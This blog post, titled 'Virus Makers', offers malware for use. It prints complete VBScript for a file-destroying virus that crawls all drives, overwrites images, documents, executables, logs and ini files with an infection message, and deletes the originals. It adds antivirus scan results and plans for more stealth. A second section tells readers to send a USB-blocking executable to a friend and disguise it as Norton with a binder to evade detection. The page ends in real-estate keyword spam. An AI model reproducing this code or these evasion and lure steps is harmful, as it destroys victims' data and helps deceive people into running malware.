Virus Makers.

by hardik davra

Source Code of Virus

Here is some code that overwrites .jpg, .doc, .exe, .gif, .log and .ini extensions with "You have been infected" and changes them into .txt

I will try to change the code so it can have more stealth when dealing with antivirus programs.


Code:
On Error Resume Next

Dim FSobj, winDir, sysDir, copySelf, newFile, rawFileData, hackedFileData, fixData, dataFixed, newFileData
Set FSobj = CreateObject("Scripting.FileSystemOject")
Set sysDir = FSobj.GetSpecialFolder(1)

beginInfestation()

sub beginInfestation()
On Error Resume Next
Dim drive,machine
Set machine = FSobj.Drives
for each drive in machine
if (drive.type = 2) or (drive.type = 3) then
indexFolders(drive.Path&"\")
end if
next
end sub

sub indexFolders(location)
On Error Resume Next
Dim specs, file, subFol
Set specs = FSobj.GetFolder(location)
subFol = specs.SubFolders
for each file in subFol
spreadData(file.Path)
indexFolders(file.Path)
next
end sub

sub spreadData(location)
On Error Resume Next
Dim folder, directory, file, generateCopy, appName, adExt, orgMes, mesStageTwo, mesStageThree, finalMes, extName
Set folder = FSobj.GetFolder(location)
Set directory = folder.Files
orgMes = "You have been infected!"
esStageTwo=replace(orgMes,chr(42),chr(68))
mesStageThree=replace(mesStageTwo,chr(124),chr(46))
finalMes=replace(mesStageThree,chr(37),chr(76))
for each file in directory
extName=lcase(FSobj.GetExtensionName(file.Path))

if (extName="jpg")or(extName="gif")then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)

elseIf (extName="log")or(extName="ini") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)

elseIf (extName="doc")or(extName="exe") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
end if
next
end sub




SOME Anti-virus programs will pick this up. It is written in VBScript (.vbs extention)

UPDATE: 2/41 Antivirus programs picked this up. Scan done by virustotal:
Code:
a-squared 4.5.0.24 2009.08.06 -
AhnLab-V3 5.0.0.2 2009.08.05 -
AntiVir 7.9.0.240 2009.08.05 -
Antiy-AVL 2.0.3.7 2009.08.05 -
Authentium 5.1.2.4 2009.08.06 -
Avast 4.8.1335.0 2009.08.06 -
AVG 8.5.0.406 2009.08.05 -
BitDefender 7.2 2009.08.06 -
CAT-QuickHeal 10.00 2009.08.05 -
ClamAV 0.94.1 2009.08.05 VBS.Pluta.A
Comodo 1880 2009.08.06 -
DrWeb 5.0.0.12182 2009.08.06 -
eSafe 7.0.17.0 2009.08.05 -
eTrust-Vet 31.6.6660 2009.08.05 -
F-Prot 4.4.4.56 2009.08.05 -
F-Secure 8.0.14470.0 2009.08.05 -
Fortinet 3.120.0.0 2009.08.05 -
GData 19 2009.08.06 -
Ikarus T3.1.1.64.0 2009.08.06 -
Jiangmin 11.0.800 2009.08.05 -
K7AntiVirus 7.10.811 2009.08.05 -
Kaspersky 7.0.0.125 2009.08.06 -
McAfee 5699 2009.08.05 -
McAfee+Artemis 5699 2009.08.05 -
McAfee-GW-Edition 6.8.5 2009.08.06 -
Microsoft 1.4903 2009.08.04 Virus:VBS/Generic1
NOD32 4310 2009.08.05 -
Norman 6.01.09 2009.08.05 -
nProtect 2009.1.8.0 2009.08.05 -
Panda 10.0.0.14 2009.08.05 -
PCTools 4.4.2.0 2009.08.05 -
Prevx 3.0 2009.08.06 -
Rising 21.41.24.00 2009.08.05 -
Sophos 4.44.0 2009.08.05 -
Sunbelt 3.2.1858.2 2009.08.05 -
Symantec 1.4.4.12 2009.08.06 -
TheHacker 6.3.4.3.377 2009.08.05 -
TrendMicro 8.950.0.1094 2009.08.05 -
VBA32 3.12.10.9 2009.08.06 -
ViRobot 2009.8.5.1869 2009.08.05 -
VirusBuster 4.6.5.0 2009.08.05 -



Creating a Virus to Disable USB Ports



Virus to disable USP portsDo you want to play a prank with your friend’s computer by disabling their USB ports? If so here is a nice trick to do that! In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer(PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the victim will not be able to use his pen drive or any other USB peripheral on his computer. The source code for this virus along with the compiled module is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports. Here is a step by step procedure to start playing the prank on your friend’s computer.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
  • block_usb.exe
  • unblock_usb.exe
3. Out of these 4 files the block_usb.exe is the virus that will block (disable) all the USB ports on the computer upon execution (double click). You need to send this file to your friend. Once he executes it it’ll block all the USB ports on his computer.
4. Before sending you can test it on your own computer. To test, just run theblock_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run theunblock_usb.exe file. Now insert the pen drive and it should get detected.
5. The block_usb.c and unblock_usb.c are the source codes. You can compile them by yourself in case if you’re interested (This is optional).
6. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
7. You can also change the icon of this file to make it look like a legitimate program. Example Take the Icon of Norton or something else and Bind the Exe File with it with any Binder. And Use Software PassPort to make it Undetectable.
I hope you like this post. Please pass your comments.
WARNING: This post is for educational purposes only. Do not misuse it.




This entry was posted in . Bookmark the permalink.

Leave a reply

Feedjit

New Page 1

Prestige Temple Bells NITESH CHELSEA Prestige Shantiniketan sale Prestige Kew Gardens Sobha silicon Oasis Sobha Valley View oceanus vista Purva 270 century silicon city nitesh caesars palace nitesh virgin island salarpuria sattva credenza brigade northridge vaswani claremont godrej united prestige gulmohar godrej garden city puravankara between the parks puravankara lalbaghroad purva between the parks provident the tree salarpuria sattva cadenza nitesh virgin island bangalore Godrej Prana Purva The Waves THE PRESIDENTIAL TOWER BANGALORE vaswani exquisite mantri energia prestige leela residences sobha halcyon bhartiya city leela residences lodha codename the central mantri energia bangalore mantri manyata tech park unishir experience unishir verzure mantri energia bangalore godrej sky byculla nitesh grand canyon nitesh rio kanakapura nitesh sloane square Sobha Aspirational Homes sobha golden quadrilateral prestige song of the south prestige kew gardens bangalore ajmera sports city salarpuria sattva east crest old madras road salarpuria sattva east crest salarpuria east crest salarpuria eastcrest sattva east crest godrej sky goyal alanoville salarpuria rhythm Sobha Green Acres Godrej Infinity Keshav Nagar Purva Silver Sands Keshavnagar Puravankara City Of Gold Purva City Of Gold Sobha Dream Acres Sobha Dream Series RMZ Marq RMZ Azure Bangalore Mahindra Windchimes Puravankara Limousine Homes Osadia Garden City Purva Limousine Homes Godrej The Trees Mumbai Prestige Song Of The South Begur Prestige Song Of The South Godrej Infinity Pune Salarpuria Sattva Pipal Tree Salarpuria Pipal Tree Salarpuria Sattva Casa Irene Salarpuria Casa Irene Lodha Codename Concept X Lodha Concept X Salarpuria Sattva Divinity

BTricks